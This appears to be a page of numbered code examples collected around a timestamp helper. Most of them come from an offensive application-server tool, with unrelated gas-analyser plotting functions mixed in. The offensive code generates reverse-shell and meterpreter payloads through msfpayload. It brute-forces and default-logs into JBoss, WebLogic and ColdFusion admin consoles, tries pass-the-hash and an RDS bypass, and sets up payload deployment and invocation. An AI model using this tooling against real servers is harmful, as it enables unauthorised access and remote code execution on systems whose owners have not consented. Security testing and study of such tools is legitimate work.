    ``options.remote_service`` must be set and ``msfpayload`` must be found
    by ``which``; otherwise an error is logged and the function returns.
    ``options.generate_payload`` is read as "host:port". Nothing is
    returned; the outcome is reported through ``utility.Msg``.
    """

    PAYLOAD = "java/jsp_shell_reverse_tcp"

    # the output form and file name depend on the remote service
    if not options.remote_service:
        utility.Msg("Please specify a remote service (-a)", LOG.ERROR)
        return
    elif options.remote_service in ["coldfusion"]:
        out = "R > shell.jsp"
    else:
        out = "W > shell.war"

    # the external generator has to be installed on the operator's machine
    if getoutput("which msfpayload") == "":
        utility.Msg("This option requires msfpayload", LOG.ERROR)
        return

    utility.Msg("Generating payload....")
    # a value with more or fewer than one ':' makes this unpacking raise
    # ValueError
    (lhost, lport) = options.generate_payload.split(":")

    # NOTE(review): lhost and lport come straight from the option string and
    # are pasted into a shell command line unquoted; validating them as a
    # host and a port number first keeps shell metacharacters out of the
    # operator's own shell.
    resp = getoutput("msfpayload %s LHOST=%s LPORT=%s %s &>/dev/null" %
                    (PAYLOAD, lhost, lport, out))

    if "Created by" in resp:
        utility.Msg("Payload generated (%s).  Payload: %s" % (out.split(' ')[2], PAYLOAD))

        # also log some auxiliary information
        # (generation time, listener address and payload name go to
        # ./src/lib/shell.log, each written through a separate shell echo)
        getoutput("echo Generated at %s > ./src/lib/shell.log" % utility.timestamp())
        getoutput("echo %s:%s >> ./src/lib/shell.log" % (lhost, lport))
        getoutput("echo %s >> ./src/lib/shell.log" % (PAYLOAD))
    else:
        utility.Msg("Error generating payload: %s" % resp, LOG.ERROR)
Пример #19
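def get_unix_timestamp(dt_str):
    """Convert *dt_str* to a timestamp, falling back to a repaired value.

    ``utility.timestamp`` is tried first; on any failure the string is
    handed to ``fix_invalid_date`` and that result is returned instead.
    """
    try:
        return utility.timestamp(dt_str)
    except Exception:
        # The fallback result used to be dropped, so callers got None.
        return fix_invalid_date(dt_str)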
Пример #20
def fix_invalid_date(dt_str):
    """Return a timestamp for a datetime string that failed normal parsing.

    Handles a datetime with a wrong TZ or a date older than 1970-01-01: the
    first 19 characters are kept, '+00:00' is appended and the result is
    parsed again. If that fails too, the timestamp of
    '1970-01-01T00:00:00+00:00' is returned.
    """
    epoch = '1970-01-01T00:00:00+00:00'
    try:
        # slicing stays inside the try so a non-string input also falls back
        forced_utc = dt_str[:19] + '+00:00'
        return utility.timestamp(forced_utc)
    except Exception:
        return utility.timestamp(epoch)
Пример #21
def checkAuth(ip, port, title, version):
    """Try to obtain an authenticated session for the interface named by *title*.

    Two paths exist:

    * For *version* "5.1", "6.0" or "6.1" with ``JINTERFACES.WM``, each pair
      in ``default_credentials`` is posted to /admin-console/login.seam and
      a 200 response is taken as success; a ``(cookies, None)`` tuple is
      returned. Neither ``state.usr_auth`` nor the wordlist is used here.
    * Otherwise the URL is chosen for ``JINTERFACES.JMX``, ``MM`` or ``WC``
      (any other title is logged as unsupported and returns None) and
      credentials are tried in this order: ``state.usr_auth`` if set (its
      ``_auth`` result is returned as-is), then ``default_credentials``,
      then every line of ``state.bf_wordlist`` for ``state.bf_user`` unless
      ``state.hasbf`` is already set.

    Returns:
        The tuple described above, or the first truthy value returned by
        ``_auth`` (named ``cook`` here - confirm its shape against
        ``_auth``), or None.
    """

    # NOTE(review): every URL below is plain http - the submitted
    # credentials travel unencrypted
    if version in ["5.1", "6.0", "6.1"] and title is JINTERFACES.WM:
        for (usr, pswd) in default_credentials:
            url = "http://%s:%s/admin-console/login.seam" % (ip, port)
            # the view state is fetched anew for every credential pair
            data = OrderedDict([
                ("login_form", "login_form"),
                ("login_form:name", usr),
                ("login_form:password", pswd),
                ("login_form:submit", "Login"),
                ("javax.faces.ViewState", utility.fetch_viewState(url)),
            ])

            response = utility.requests_post(url, data=data)
            if response.status_code == 200:
                # NOTE(review): the accepted password is written to the log
                # in clear text; the log is sensitive from here on
                utility.Msg(
                    "Successfully authenticated with %s:%s" % (usr, pswd),
                    LOG.DEBUG)
                # for 5.1 the cookies are read from the first response in the
                # redirect history rather than from the final response
                if version in ["5.1"]:
                    return (dict_from_cookiejar(response.history[0].cookies),
                            None)
                return (dict_from_cookiejar(response.cookies), None)

    else:
        if title is JINTERFACES.JMX:
            url = "http://%s:%s/jmx-console/" % (ip, port)
        elif title is JINTERFACES.MM:
            url = "http://%s:%s/management" % (ip, port)
        elif title is JINTERFACES.WC:
            url = "http://%s:%s/web-console" % (ip, port)
        else:
            utility.Msg("Unsupported auth interface: %s" % title, LOG.DEBUG)
            return

        # check with given auth
        if state.usr_auth:
            # a password that itself contains ':' makes this unpacking raise
            # ValueError
            (usr, pswd) = state.usr_auth.split(':')
            return _auth(usr, pswd, url, version)

        # else try default credentials
        for (usr, pswd) in default_credentials:
            cook = _auth(usr, pswd, url, version)
            if cook:
                return cook

        # if we're still here, check if they supplied a wordlist
        if state.bf_wordlist and not state.hasbf:

            # set before the attempt, so the wordlist pass is skipped for as
            # long as the flag stays set
            state.hasbf = True
            wordlist = []
            with open(state.bf_wordlist, 'r') as f:
                # ensure everything is ascii or requests will explode
                wordlist = [
                    x.decode("ascii", "ignore").rstrip()
                    for x in f.readlines()
                ]

            utility.Msg(
                "Brute forcing %s account with %d passwords..." %
                (state.bf_user, len(wordlist)), LOG.DEBUG)

            # One login attempt per candidate. On the target this shows up as
            # a run of failed logins for one account from one source, which
            # lockout or rate limiting on the admin interface cuts short.
            try:
                for (idx, word) in enumerate(wordlist):
                    stdout.flush()
                    stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m" \
                                        % (utility.timestamp(), state.bf_user,
                                           idx+1, len(wordlist)))

                    cook = _auth(state.bf_user, word, url, version)
                    if cook:
                        print('')  # newline

                        # lets insert these credentials to the default list so we
                        # don't need to bruteforce it each time
                        if not (state.bf_user, word) in default_credentials:
                            default_credentials.insert(0,
                                                       (state.bf_user, word))

                        # NOTE(review): the accepted password is written to
                        # the log in clear text; the log is sensitive from
                        # here on
                        utility.Msg(
                            "Successful login %s:%s" % (state.bf_user, word),
                            LOG.SUCCESS)
                        return cook

                print('')

            except KeyboardInterrupt:
                # Ctrl-C abandons the wordlist pass; the function returns None
                pass
Пример #22
        # exploitation engine for the service
        utility.Msg("Loading auxiliary for '%s'..." % fingerengine.service,
                                                      LOG.DEBUG)

        # execute the auxiliary engine
        auxengine(fingerengine)

if __name__ == "__main__":
    # Script entry point: banner, option parsing, then the prerun / run /
    # postrun phases, bracketed by start and finish messages.

    utility.header()
    options = parse(sys.argv[1:])

    # set platform
    state.platform = platform.system().lower()

    utility.Msg("Started at %s" % (utility.timestamp()))

    # log the CLI args
    # NOTE(review): the argument vector is logged verbatim; if any option
    # carries a credential it ends up in the log - confirm who can read it.
    utility.log(' '.join(sys.argv))

    try:
        prerun(options)

        # run() is entered only when an address or an input list was given
        if options.ip or options.input_list:
            run(options)

        postrun(options)
    except KeyboardInterrupt:
        # Ctrl-C ends the phases quietly; the finish message is still printed
        pass

    utility.Msg("Finished at %s" % (utility.timestamp()))
Пример #23
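def rga_plot(filepath, **kwargs):
    """Plot partial-pressure traces from an RGA data file.

    The file is read with ``rga_read``; column 0 of its data is the time
    axis and the remaining columns are one trace per species.

    Keyword Args:
        chan2plot: 'all' (every species returned by ``rga_read``),
            'AllXenon' (the four xenon isotopes) or a list of species names.
            Defaults to 'all'.
        bounds: 'full' for the whole record, otherwise a value handed to
            ``utility.timestamp`` and then ``utility.bound_finder`` to get
            the first and last row to plot. Defaults to 'full'.
        yscale: 'log' or 'linear'. Defaults to 'linear'.
        colors: Line colour used until a species with a preset colour is
            plotted; after that the most recent preset carries over.
        date: Date forwarded to ``rga_read``. The default 'same' titles the
            plot with the module-level ``date_g``.
        tag, overlay, style: Accepted but not used by this function.
    """
    chan2plot = kwargs.get('chan2plot', 'all')
    bounds = kwargs.get('bounds', 'full')
    yscale = kwargs.get('yscale', 'linear')
    col = kwargs.get('colors', 'default')
    date2 = kwargs.get('date', 'same')

    # 'same' means: title the plot with the module-level date
    date = date_g if date2 == 'same' else date2

    import matplotlib.pyplot as plt
    import utility as ut

    # The file used to be read twice in a row with identical arguments.
    species, p_data = rga_read(filepath, date=date2)

    # Separate time and pressure data
    time = p_data[:, 0]
    p_data = p_data[:, 1:]

    # Row range to plot. The hand-written nearest-index search that used to
    # precede bound_finder is gone: its result was never used, and it raised
    # NameError when the first sample already lay past a bound.
    if bounds == 'full':
        bound_i = [0, len(time) - 1]
    else:
        bound_i = ut.bound_finder(time, ut.timestamp(bounds))

    # Resolve the channel shorthands
    if chan2plot == 'all':
        chan2plot = species
    if chan2plot == 'AllXenon':
        chan2plot = ['Xenon129', 'Xenon131', 'Xenon132', 'Xenon134']

    preset_colors = {
        'Nitrogen': 'FireBrick',
        'Oxygen': 'Turquoise',
        'Hydrogen': 'Goldenrod',
        'CarbonDioxide': 'DarkGreen',
        'Water': 'MidnightBlue',
        'Xenon129': 'Violet',
        'Xenon131': 'DarkViolet',
        'Xenon132': 'DarkMagenta',
        'Xenon134': 'DarkSlateBlue',
        'Argon': 'DeepPink',
        'mass83': 'DodgerBlue',
        'Barium138': 'DodgerBlue',
    }

    # Plot the lines
    plt.figure('rga_plot')
    plt.clf()
    first, last = bound_i[0], bound_i[1]
    for name in chan2plot:
        # a species without a preset keeps whatever colour is current
        col = preset_colors.get(name, col)
        plt.plot(time[first:last],
                 p_data[first:last, species.index(name)],
                 color=col,
                 label=name)
    plt.xlim(time[first], time[last])
    if yscale == 'log':
        ut.log()
    if yscale == 'linear':
        ut.sci()
    plt.xlabel('Time (s)')
    plt.ylabel('Partial Pressure (Torr)')
    plt.title(str(date) + ' pvt' + str(filepath))
    plt.legend(fontsize=12)
    plt.show()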
Пример #24
        utility.Msg("Fingerprinting completed.", LOG.UPDATE)

        # We've got the host fingerprinted, now kick off the
        # exploitation engine for the service
        utility.Msg("Loading auxiliary for '%s'..." % fingerengine.service,
                                                      LOG.DEBUG)

        # execute the auxiliary engine
        auxengine(fingerengine)

if __name__ == "__main__":
    # Script entry point: banner, option parsing, then the prerun / run /
    # postrun phases, bracketed by start and finish messages.
    utility.header()
    options = parse(sys.argv[1:])

    utility.Msg("Started at %s" % (utility.timestamp()))

    # log the CLI args
    # NOTE(review): the argument vector is logged verbatim; if any option
    # carries a credential it ends up in the log - confirm who can read it.
    utility.log(' '.join(sys.argv))

    try:
        prerun(options)

        # run() is entered only when an address or an input list was given
        if options.ip or options.input_list:
            run(options)

        postrun(options)
    except KeyboardInterrupt:
        # Ctrl-C ends the phases quietly; the finish message is still printed
        pass

    utility.Msg("Finished at %s" % (utility.timestamp()))
Пример #25
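def rga_int(filepath, bounds, **kwargs):
    """Sum selected RGA channels over a time window and plot them.

    The file is loaded with ``rga_read``; its first data column is used as
    the time axis and the remaining columns as per-species pressures.

    Args:
        filepath: Passed straight to ``rga_read``.
        bounds: Two-element sequence giving the window. If the first
            element is a ``str`` the pair is converted with
            ``ut.timestamp``.
        **kwargs:
            chan2int: ``'all'`` (default, every species in the file),
                ``'AllXenon'`` (the four xenon channels) or a list of
                species names.
            yscale: ``'log'`` (default) or ``'linear'``.
            colors: Fallback line colour for species that have no entry
                in the built-in palette; ``'default'`` leaves the choice
                to matplotlib.
            store: When ``True`` the list of sums is returned.
            plt_sub: When ``True`` the plotted traces have the
                background subtracted.
            boundtype: ``'edge'`` (default) uses ``bounds`` as
                ``[start, stop]``; ``'front'`` treats it as
                ``[start, duration]``.

    Returns:
        The list of background-corrected sums, one per channel, when
        ``store`` is ``True``; otherwise ``None``.
    """
    # Define keyword arguments
    chan2int = kwargs.get('chan2int', 'all')
    yscale = kwargs.get('yscale', 'log')
    col = kwargs.get('colors', 'default')
    output = kwargs.get('store', False)
    pltsub = kwargs.get('plt_sub', False)
    bndtype = kwargs.get('boundtype', 'edge')

    # Import modules
    import numpy as np
    import matplotlib.pyplot as plt
    import utility as ut

    # Fixed colours for the species this function knows about.
    palette = {
        'Nitrogen': 'FireBrick',
        'Oxygen': 'Turquoise',
        'Hydrogen': 'Goldenrod',
        'CarbonDioxide': 'DarkGreen',
        'Water': 'MidnightBlue',
        'Xenon129': 'Violet',
        'Xenon131': 'DarkViolet',
        'Xenon132': 'DarkMagenta',
        'Xenon134': 'DarkSlateBlue',
        'Argon': 'DeepPink',
        'mass83': 'DodgerBlue',
    }
    # 'default' is not a colour matplotlib accepts, so an unlisted species
    # used to raise (or silently inherit the previous channel's colour).
    # None means "let matplotlib pick from its colour cycle".
    fallback_colour = None if col == 'default' else col

    # Get the data from the file using rga_read
    species, p_data = rga_read(filepath)

    # Separate time and pressure data
    time = p_data[:, 0]
    p_data = p_data[:, 1:]
    # Not used below; kept because ut.avediff is opaque from here.
    dt = ut.avediff(time)

    # Convert time to seconds
    if isinstance(bounds[0], str):
        bounds = ut.timestamp(bounds)

    if bndtype == 'front':
        bounds = [bounds[0], bounds[0] + bounds[1]]

    # Find the index of the time closest to bounds
    # (assumes ut.bound_finder returns two non-negative integer indices
    # -- TODO confirm)
    bound_i = ut.bound_finder(time, bounds)
    start, stop = bound_i[0], bound_i[1]

    # Deal with which channels to integrate
    if chan2int == 'all':
        chan2int = species
    if chan2int == 'AllXenon':
        chan2int = ['Xenon129', 'Xenon131', 'Xenon132', 'Xenon134']

    # Integrate selected channels over bounds.
    # The background is the mean of up to 20 samples before the window.
    # The start is clamped at 0: a negative slice start would wrap to the
    # end of the array and yield an empty (NaN) or unrelated baseline.
    # NOTE(review): the background mean is subtracted once from the sum,
    # not once per sample, and the sum is not scaled by the sample
    # spacing -- confirm that is the intended quantity.
    bg_start = max(start - 20, 0)
    ints, bg = [], []
    for i in chan2int:
        column = species.index(i)
        baseline = p_data[bg_start:start, column]
        # No samples before the window: use a zero background, not NaN.
        bg.append(np.mean(baseline) if baseline.size else 0.0)
        ints.append(np.sum(p_data[start:stop, column]) - bg[-1])

    # Plot the lines, with a 10-sample margin either side of the window.
    plt.figure('rga_int')
    plt.clf()
    lo = max(start - 10, 0)
    hi = stop + 10  # a slice end past the array is harmless
    labels = []
    for j, i in enumerate(chan2int):
        column = species.index(i)
        plot_kwargs = {'label': i}
        line_colour = palette.get(i, fallback_colour)
        if line_colour is not None:
            plot_kwargs['color'] = line_colour

        # Same as the original: only an explicit True/False draws a trace.
        if pltsub == True or pltsub == False:
            trace = p_data[lo:hi, column]
            if pltsub == True:
                trace = trace - bg[j]
            plt.plot(time[lo:hi], trace, **plot_kwargs)

        labels.append(i + ': ' + ut.conv(ints[j]) + 'Torr')
    figtext = '\n'.join(labels)

    # Clamp the axis limits so a window near either end of the record
    # neither wraps around nor raises IndexError.
    left = max(start - 5, 0)
    right = min(stop + 5, len(time) - 1)
    plt.xlim(time[left], time[right])
    plt.axvline(bounds[0], color='black', ls='--')
    plt.axvline(bounds[1], color='black', ls='--')
    if yscale == 'log':
        ut.log()
    if yscale == 'linear':
        ut.sci()
    plt.xlabel('Time (s)')
    plt.ylabel('Partial Pressure (Torr)')
    # `date` is not defined in this function; presumably a module-level
    # name -- verify.
    plt.title(str(date) + ' RGA integral')
    ut.textbox(figtext, [.05, .95])
    plt.legend()
    plt.show()

    if output == True:
        return ints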
Пример #26
def checkAuth(ip, fingerprint, returnCookie = False):
    """ Try to authenticate to the service at `ip`, stopping at the first
    credential pair that `_auth` accepts.

    Credentials are tried in this order: the pair in state.usr_auth (if
    set), each pair in default_credentials, then -- only when
    state.bf_wordlist is set and state.hasbf is still false -- every line
    of the wordlist as a password for state.bf_user.

    Returns the truthy value `_auth` produced for the first accepted pair.
    (None, None) is returned when the operator declines the lockout prompt
    or the wordlist cannot be read.  If every attempt fails, or the
    wordlist loop is interrupted with Ctrl-C, the function falls off the
    end and returns None, so callers must handle both None and
    (None, None).

    NOTE(review): `returnCookie` is accepted but never read in this body.
    """

    # check with given auth
    if state.usr_auth:
        # NOTE(review): split(':') without a maxsplit raises ValueError
        # when the value holds more than one ':' (e.g. a password that
        # contains a colon) or none at all.
        (usr, pswd) = state.usr_auth.split(':')
        auth = _auth(usr, pswd, ip, fingerprint)
        if auth:
            return auth

    # else try default credentials
    for (usr, pswd) in default_credentials:

        auth = _auth(usr, pswd, ip, fingerprint)
        if auth:
            return auth

    # if we're still here, lets check for a wordlist
    if state.bf_wordlist and not state.hasbf:
    
        #
        # by default, certain WebLogic servers have a lockout of 5 attempts
        # before a 30 minute lock.  Lets confirm the user knows this.
        # Nothing in this loop paces or caps the attempts, so that
        # server-side lockout is the control it runs into.
        #
        # NOTE(review): the check below is a substring test -- any reply
        # containing the letter 'n' aborts, and an empty reply continues
        # (assuming capture_input returns the raw reply string).
        #
        tmp = utility.capture_input("WebLogic has a lockout after 5 attempts.  Continue? [Y/n]")
        if 'n' in tmp: return (None, None)

        # Set before the wordlist is read, so the list is walked at most
        # once per process even if reading it fails.
        state.hasbf = True
        wordlist = []

        try:
            with open(state.bf_wordlist, 'r') as f:
                # Non-ASCII bytes are dropped from each line, so entries
                # containing them are silently altered, not skipped.
                wordlist = [x.decode('ascii', "ignore").rstrip() for x in f.readlines()]
        except Exception, e:
            # A read failure is only reported at DEBUG level.
            utility.Msg(e, LOG.DEBUG)
            return (None, None)

        utility.Msg('Brute forcing %s account with %d passwords...' % 
                                    (state.bf_user, len(wordlist)), LOG.DEBUG)

        try:
            for (idx, word) in enumerate(wordlist):
                # Progress line rewritten in place on the terminal.
                stdout.flush()
                stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m" \
                                % (utility.timestamp(), state.bf_user,
                                   idx+1, len(wordlist)))

                auth = _auth(state.bf_user, word, ip, fingerprint)
                if auth:
                    print ''

                    # insert creds into default cred list
                    if not (state.bf_user, word) in default_credentials:
                        default_credentials.insert(0, (state.bf_user, word))

                    # NOTE(review): the accepted password is emitted in
                    # clear text through utility.Msg; any log file this
                    # feeds has to be handled as credential material.
                    utility.Msg("Successful login %s:%s" % 
                                    (state.bf_user, word), LOG.SUCCESS)
                    return auth

            print ''

        except KeyboardInterrupt:
            # Ctrl-C stops the loop; the function then returns None.
            pass
Пример #27
def checkAuth(ip, port, title, version):
    """ Try to authenticate to the ColdFusion administrator page on
    ip:port and return the first truthy result.

    The login URL is /CFIDE/administrator/enter.cfm, or index.cfm when
    `version` is '5.0'.  `title` is not read in this body.

    Order of attempts:
      1. state.usr_auth, if set.  For versions 7.0/8.0/9.0 a value of 40
         or more characters is first handed to attemptPTH; after that the
         value is split into user:password (user defaults to "admin" when
         there is no ':') and the result of `_auth` is returned as-is --
         on failure nothing further is tried.
      2. Each pair in default_credentials.
      3. attemptRDS, for version 9.0 only.
      4. Each line of state.bf_wordlist as a password for state.bf_user,
         once per process (guarded by state.hasbf).

    Returns whatever the successful helper returned; None when nothing
    succeeds, when the wordlist cannot be read, or on Ctrl-C.

    NOTE(review): the URL built here is always http://; state.ssl is not
    consulted in this body (it may be applied inside the request helpers
    -- not visible here), so credentials may travel in clear text.
    """

    url = "http://{0}:{1}/CFIDE/administrator/enter.cfm".format(ip, port)
    if version in ['5.0']:
        url = 'http://{0}:{1}/CFIDE/administrator/index.cfm'.format(ip, port)

    # check with given auth
    if state.usr_auth:
        if version in ['7.0', '8.0', '9.0'] and len(state.usr_auth) >= 40:
            # try pth
            # (the length test is the only thing that routes a value
            # here; a long user:password string takes this path too)
            cook = attemptPTH(url, state.usr_auth)
            if cook:
                return cook

        if ':' in state.usr_auth:
            # NOTE(review): raises ValueError when the value holds more
            # than one ':' (e.g. a password that contains a colon).
            (usr, pswd) = state.usr_auth.split(':')
        else:
            (usr, pswd) = "admin", state.usr_auth
        # Returned directly, truthy or not: supplied credentials
        # short-circuit every fallback below.
        return _auth(usr, pswd, url, version)

    # else try default creds
    for (usr, pswd) in default_credentials:
        cook = _auth(usr, pswd, url, version)
        if cook:
            return cook

    # if we're 9.x, we can use the RDS bypass
    if version in ["9.0"]:
        cook = attemptRDS(ip, port)
        if cook:
            return cook

    # if we're still here, check if they supplied a wordlist
    if state.bf_wordlist and not state.hasbf:

        # Set before reading, so the wordlist is walked at most once per
        # process even when the read fails.
        state.hasbf = True
        wordlist = []
        try:
            with open(state.bf_wordlist, 'r') as f:
                # ensure everything is ascii or requests will explode
                # (non-ASCII bytes are dropped, which silently alters
                # entries that contain them)
                wordlist = [
                    x.decode('ascii', 'ignore').rstrip()
                    for x in f.readlines()
                ]
        except Exception, e:
            utility.Msg("Failed to read wordlist (%s)" % e, LOG.ERROR)
            return

        utility.Msg(
            "Brute forcing account %s with %d passwords..." %
            (state.bf_user, len(wordlist)), LOG.DEBUG)

        try:

            # Nothing in this loop paces or caps the attempts.
            for (idx, word) in enumerate(wordlist):
                # Progress line rewritten in place on the terminal.
                stdout.flush()
                stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"\
                                % (utility.timestamp(), state.bf_user, idx+1,
                                   len(wordlist)))

                cook = _auth(state.bf_user, word, url, version)
                if cook:
                    print ''  # newline

                    # Cache the working pair at the head of the default
                    # list so later calls try it first.
                    if not (state.bf_user, word) in default_credentials:
                        default_credentials.insert(0, (state.bf_user, word))

                    # NOTE(review): the accepted password is emitted in
                    # clear text through utility.Msg; any log file this
                    # feeds has to be handled as credential material.
                    utility.Msg(
                        "Successful login %s:%s" % (state.bf_user, word),
                        LOG.SUCCESS)
                    return cook

            print ''

        except KeyboardInterrupt:
            # Ctrl-C stops the loop; the function then returns None.
            pass
Пример #28
def run(options):
    """ This module is used for generating reverse shell payloads.  It's not
    flexible in what sorts of payloads it can generate, but this is by design.

    Highly customized payloads, or stuff like meterpreter/reverse java payloads
    should be generated using proper tools, such as msfpayload.  This is merely
    a quick way for us to get a reverse shell on a remote system.

    Reads options.remote_service, options.remote_os and
    options.generate_payload ("host:port").  Returns None in every case;
    results are reported through utility.Msg.

    Files written relative to the current working directory: one of
    shell.jsp / shell.jar / shell.war (via shell redirection), and
    ./src/lib/shell.log holding the generation time, the host:port pair
    and the payload name.  The log is truncated on each successful run.
    """

    PAYLOAD = "java/jsp_shell_reverse_tcp"
    SHELL = "cmd.exe"

    # Pick the output format and file name from the service hint.
    if not options.remote_service:
        utility.Msg("Please specify a remote service (-a)", LOG.ERROR)
        return
    elif not options.remote_os:
        utility.Msg("Please specify a remote OS (-o)", LOG.ERROR)
        return
    elif options.remote_service in ["coldfusion"]:
        out = "R > shell.jsp"
    elif options.remote_service in ["axis2"]:
        PAYLOAD = "java/meterpreter/reverse_tcp"
        out = "R > shell.jar"
    else:
        out = "W > shell.war"

    if options.remote_os != "windows":
        SHELL = "/bin/bash"

    # Empty output from `which` is taken to mean the tool is not on PATH.
    if getoutput("which msfpayload") == "":
        utility.Msg("This option requires msfpayload", LOG.ERROR)
        return

    utility.Msg("Generating payload....")
    # NOTE(review): raises ValueError unless the value holds exactly one
    # ':' (a missing port or an IPv6 literal both fail here).
    (lhost, lport) = options.generate_payload.split(":")

    # NOTE(review): the command line is assembled by string interpolation
    # and run through a shell.  lhost/lport are taken from the command
    # line without validation, so shell metacharacters in them would be
    # interpreted.  Validating them as a host and an integer port, or
    # passing an argument list and redirecting in Python, removes that.
    resp = getoutput("msfpayload %s LHOST=%s LPORT=%s SHELL=%s %s" %
                     (PAYLOAD, lhost, lport, SHELL, out))
    '''For axis2 payloads, we have to add a few things to the msfpayload output'''
    if (options.remote_service in ["axis2"]):
        services_xml = """<service name="shell" scope="application">
                            <description>
                                Clusterd axis2 service
                            </description>
                            <messageReceivers>
                                <messageReceiver
                                    mep="http://www.w3.org/2004/08/wsdl/in-only"
                                    class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/>
                                <messageReceiver
                                    mep="http://www.w3.org/2004/08/wsdl/in-out"
                                    class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
                            </messageReceivers>
                            <parameter name="ServiceClass">
                                metasploit.PayloadServlet
                            </parameter>
                        </service>"""

        # Opened in append mode: the archive written above gains one
        # class file and a services.xml descriptor.  This runs before the
        # success check below, so it is attempted even when generation
        # reported an error.
        with ZipFile('shell.jar', 'a') as shellZip:
            shellZip.write("./src/lib/axis2/PayloadServlet.class",
                           "metasploit/PayloadServlet.class")
            shellZip.writestr("META-INF/services.xml", services_xml)

    # Success is inferred from the tool's output: (almost) empty, or
    # containing the string 'Created by'.
    if len(resp) <= 1 or 'Created by' in resp:
        # out is "<fmt> > <file>", so index 2 is the file name.
        utility.Msg("Payload generated (%s).  Payload: %s" %
                    (out.split(' ')[2], PAYLOAD))

        # also log some auxiliary information
        # NOTE(review): written with shell `echo` and interpolated values
        # (same injection concern as above); a plain file write would do.
        getoutput("echo Generated at %s > ./src/lib/shell.log" %
                  utility.timestamp())
        getoutput("echo %s:%s >> ./src/lib/shell.log" % (lhost, lport))
        getoutput("echo %s >> ./src/lib/shell.log" % (PAYLOAD))
    else:
        utility.Msg("Error generating payload: %s" % resp, LOG.ERROR)
Пример #29
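def parse(arguments):
    """ Parse command line options

    Builds the argparse parser, parses `arguments`, copies a subset of
    the parsed values into the shared `state` module and returns the
    argparse namespace.  Prints the help text and exits with status 1
    when the process was started with no arguments at all.

    NOTE(review): --usr-auth and --proxy-auth take username:password on
    the command line, so the secrets are visible in the process list and
    shell history, and in any log that records the invocation.
    """
    parser = ArgumentParser(usage='./clusterd.py [options]')

    #
    # Connection related command line arguments
    #
    connection = parser.add_argument_group(
        "Connection", description='Options for configuring the connection')
    connection.add_argument("-i",
                            help='Server address',
                            action='store',
                            dest='ip',
                            metavar='[ip address]')
    connection.add_argument("-iL",
                            help='Server list',
                            action='store',
                            dest='input_list',
                            metavar='[file]')
    connection.add_argument('-p',
                            help='Server port',
                            action='store',
                            dest='port',
                            type=int,
                            metavar='[port]')
    connection.add_argument('--proxy',
                            help='Connect through proxy [http|https]',
                            action='store',
                            dest='proxy',
                            metavar="[proxy://server:port]")
    connection.add_argument('--proxy-auth',
                            help='Proxy credentials',
                            action='store',
                            dest='proxy_auth',
                            metavar='[username:password]')
    connection.add_argument('--timeout',
                            help='Connection timeout [%ds]' % state.timeout,
                            action='store',
                            dest='timeout',
                            default=state.timeout,
                            metavar='[seconds]')
    connection.add_argument("--random-agent", help='Use a random User-Agent for'\
                            ' requests', action='store_true', dest='random_agent',
                            default=False)
    connection.add_argument("--ssl",
                            help='Force SSL',
                            action='store_true',
                            dest='ssl',
                            default=False)

    #
    # Remote host command line arguments
    #
    remote = parser.add_argument_group(
        'Remote Host', description='Settings specific to the remote host')
    remote.add_argument('-a',
                        help='Hint at remote host service',
                        action='store',
                        dest='remote_service',
                        metavar='[%s]' % ('|'.join(state.supported_platforms)))
    remote.add_argument('-o',
                        help='Hint at remote host OS',
                        action='store',
                        dest='remote_os',
                        metavar='[windows|linux]',
                        default='windows')
    remote.add_argument('-v',
                        help='Specific version to test',
                        action='store',
                        dest='version',
                        metavar='[version]',
                        default=None)
    remote.add_argument('--usr-auth',
                        help='Login credentials for service',
                        action='store',
                        dest='usr_auth',
                        metavar='[username:password]')
    remote.add_argument('--fingerprint',
                        help='Fingerprint the remote system',
                        action='store_true',
                        dest='fp',
                        default=False)
    remote.add_argument("--arch",
                        help='Specify remote OS architecture',
                        action='store',
                        dest='arch',
                        default='x86',
                        metavar='[x86|x64]')
    remote.add_argument("--delay",
                        help='Delay N seconds between each attempt',
                        action='store',
                        dest='delay',
                        default=None,
                        metavar='[seconds]')

    #
    # deploy options
    #
    deploy = parser.add_argument_group(
        "Deploy", description='Deployment flags and settings')
    deploy.add_argument("--deploy",
                        help='Deploy to the discovered service',
                        action='store',
                        dest='deploy',
                        metavar='[file]')
    deploy.add_argument("--undeploy",
                        help='Undeploy file from server',
                        action='store',
                        dest='undeploy',
                        metavar='[context]')
    deploy.add_argument("--deployer",
                        help="Specify a deployer to use",
                        action='store',
                        dest='deployer',
                        default=None,
                        metavar='[deployer]')
    deploy.add_argument("--invoke",
                        help="Invoke payload after deployment",
                        action='store_true',
                        dest='invoke_payload',
                        default=False)
    deploy.add_argument("--rand-payload",
                        help='Use a random name for the deployed file',
                        action='store_true',
                        dest='rand_payload',
                        default=None)
    deploy.add_argument("-b",
                        help="Brute force credentials for user [admin]",
                        action='store',
                        dest='bf_user',
                        metavar='[user]',
                        default='admin')
    deploy.add_argument('--wordlist',
                        help='Wordlist for brute forcing passwords',
                        action='store',
                        dest='wordlist',
                        default=None,
                        metavar='[path]')

    #
    # iterate over our supported platforms and build their
    # auxiliary modules
    #
    for platform in state.supported_platforms:

        group = parser.add_argument_group(platform + " modules")
        group = build_platform_flags(platform, group)

    other = parser.add_argument_group("Other",
                                      description='Miscellaneous flags')
    other.add_argument("--deployer-list",
                       help="List all available deployers",
                       action='store',
                       dest='deploy_list',
                       const='All',
                       nargs='?',
                       metavar='platform')
    other.add_argument("--aux-list",
                       help="List all available exploits",
                       action='store',
                       dest='aux_list',
                       const='All',
                       nargs='?',
                       metavar='platform')
    other.add_argument("--gen-payload",
                       help='Generate a reverse shell payload',
                       action='store',
                       dest='generate_payload',
                       metavar='[host:port] for reverse connection')
    other.add_argument(
        "--discover",
        help=
        "Attempt to discover application servers using the specified nmap gnmap output (use -sV when scanning)",
        action="store",
        dest='discovery_file',
        metavar='[discovery_file]')
    other.add_argument("--listen",
                       help='Adapter to listen on when needed',
                       action='store',
                       dest='listener',
                       metavar='[adapter]',
                       default=None)
    other.add_argument("-d",
                       help='Enable debug output',
                       action='store_true',
                       dest='debug',
                       default=False)
    other.add_argument("-l",
                       help='Log output to file [$time$_log.log]',
                       dest='flog',
                       action='store_true',
                       default=False)

    # parse cli options
    options = parser.parse_args(arguments)

    # Looks at the process argv, not at `arguments`, so the help text is
    # only shown when the program itself was started with no flags.
    if len(sys.argv) <= 1:
        parser.print_help()
        sys.exit(1)

    #
    # Setup state variables from given flags
    #
    if options.proxy:
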